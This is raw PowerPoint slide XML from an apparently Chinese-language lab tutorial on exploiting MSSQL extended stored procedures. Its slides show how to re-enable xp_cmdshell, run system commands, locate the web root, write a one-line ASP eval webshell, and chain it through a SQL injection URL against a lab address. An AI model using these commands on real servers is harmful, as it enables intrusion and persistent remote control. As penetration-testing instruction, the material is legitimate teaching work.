              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4FFFE6-75ED-4B09-BE2A-F6514086A878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="2553904" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ln w="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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B70F2AF6-4739-4762-B688-19720BC3C5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5150014" y="1021342"/>
            <a:ext cx="5208401" cy="957287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23217417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2"/>
            <a:ext cx="11035409" cy="48013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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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执行命令</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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> server 2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>版本以后默认关闭，需要开启后使用</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启用</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xp_cmdshell</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执行系统命令</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614849" y="4276655"/>
            <a:ext cx="9488052" cy="369326"/>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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'show advanced options', 1;RECONFIGURE;EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>', 1;RECONFIGURE; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD10E77-E17A-450B-BD43-8AB0B1B9E9B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614848" y="5189494"/>
            <a:ext cx="3098843" cy="369326"/>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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB517397-84F0-41A9-9388-69FD9EDB217D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614848" y="5838258"/>
            <a:ext cx="4301123" cy="61554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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'where /r c:\ *.asp'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>根目录路径</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F73768-2FEE-4D2E-8598-0EF652E56E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069263" y="4680513"/>
            <a:ext cx="4275056" cy="2028916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269117869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2"/>
            <a:ext cx="11035409" cy="52937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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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执行命令</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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> server 2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>版本以后默认关闭，需要开启后使用</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利用</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写</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webshell</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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>绝对路径可利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令和</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其他扩展存储过程组合利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649124" y="4276655"/>
            <a:ext cx="7934241" cy="61554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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'echo ^&lt;%eval request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>")%^&gt; &gt; c:\inetpub\wwwroot\shell.asp'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>操作系统中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>是转义符号，此处利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>转义原本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>符号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C703843B-40E8-4F1F-8BA9-34D018178E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4058772" y="5059668"/>
            <a:ext cx="7934241" cy="1616617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39822387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2"/>
            <a:ext cx="11035409" cy="28315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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1"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b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扩展利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2128878" y="3551991"/>
            <a:ext cx="7934241" cy="258531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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>http://192.168.172.140/less-1.asp?id=1';exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
